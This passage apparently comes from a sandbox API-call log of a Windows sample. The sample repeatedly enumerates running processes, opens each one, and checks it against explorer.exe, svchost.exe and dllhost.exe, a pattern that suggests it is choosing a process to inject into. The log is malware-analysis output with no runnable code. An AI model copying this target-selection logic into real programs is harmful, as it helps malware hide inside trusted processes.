Wow64Process=0x10fb58) returned 1 [0250.388] CloseHandle (hObject=0xd8) returned 1 [0250.388] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0250.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0250.388] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.388] CloseHandle (hObject=0xd8) returned 1 [0250.388] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0250.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0250.389] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.389] CloseHandle (hObject=0xd8) returned 1 [0250.389] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0250.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0250.389] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.390] CloseHandle (hObject=0xd8) returned 1 [0250.390] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0250.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0250.390] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.390] CloseHandle (hObject=0xd8) returned 1 [0250.390] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0250.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0250.391] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.391] CloseHandle (hObject=0xd8) returned 1 [0250.391] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0250.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0250.391] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.391] CloseHandle (hObject=0xd8) returned 1 [0250.391] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0250.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0250.392] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.392] CloseHandle (hObject=0xd8) returned 1 [0250.392] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0250.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0250.392] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.392] CloseHandle (hObject=0xd8) returned 1 [0250.392] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0250.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0250.393] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.393] CloseHandle (hObject=0xd8) returned 1 [0250.393] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0250.394] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0250.394] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0250.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0250.394] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0250.395] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0250.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0250.395] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0250.396] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.396] CloseHandle (hObject=0xd8) returned 1 [0250.396] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0250.396] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0250.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0250.397] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.397] CloseHandle (hObject=0xd8) returned 1 [0250.397] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0250.397] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0250.397] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0250.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0250.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0250.398] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.398] CloseHandle (hObject=0xd8) returned 1 [0250.398] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0250.398] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.398] CloseHandle (hObject=0xd8) returned 1 [0250.398] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0250.398] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0250.399] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.399] CloseHandle (hObject=0xd8) returned 1 [0250.399] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.399] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0250.400] CloseHandle (hObject=0xd4) returned 1 [0250.400] Sleep (dwMilliseconds=0x3e8) [0251.426] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0251.428] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0251.429] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0251.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0251.429] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0251.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0251.430] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0251.430] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0251.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0251.431] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0251.431] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0251.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0251.432] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0251.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0251.432] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0251.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0251.433] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0251.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0251.433] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0251.434] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0251.434] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0251.435] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0251.435] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0251.436] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0251.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0251.436] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0251.437] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0251.437] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0251.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0251.438] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.438] CloseHandle (hObject=0xd8) returned 1 [0251.438] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0251.438] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0251.438] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0251.438] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0251.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0251.439] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0251.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0251.439] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.439] CloseHandle (hObject=0xd8) returned 1 [0251.439] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0251.439] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0251.439] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0251.439] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0251.440] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0251.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0251.440] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0251.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0251.441] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.441] CloseHandle (hObject=0xd8) returned 1 [0251.441] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0251.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0251.441] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.442] CloseHandle (hObject=0xd8) returned 1 [0251.442] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0251.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0251.442] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.442] CloseHandle (hObject=0xd8) returned 1 [0251.442] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0251.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0251.443] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.443] CloseHandle (hObject=0xd8) returned 1 [0251.443] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0251.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0251.443] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.443] CloseHandle (hObject=0xd8) returned 1 [0251.443] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0251.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0251.444] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.444] CloseHandle (hObject=0xd8) returned 1 [0251.444] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0251.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0251.444] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.444] CloseHandle (hObject=0xd8) returned 1 [0251.445] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0251.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0251.445] IsWow64Process (in: hProcess=0xd8, 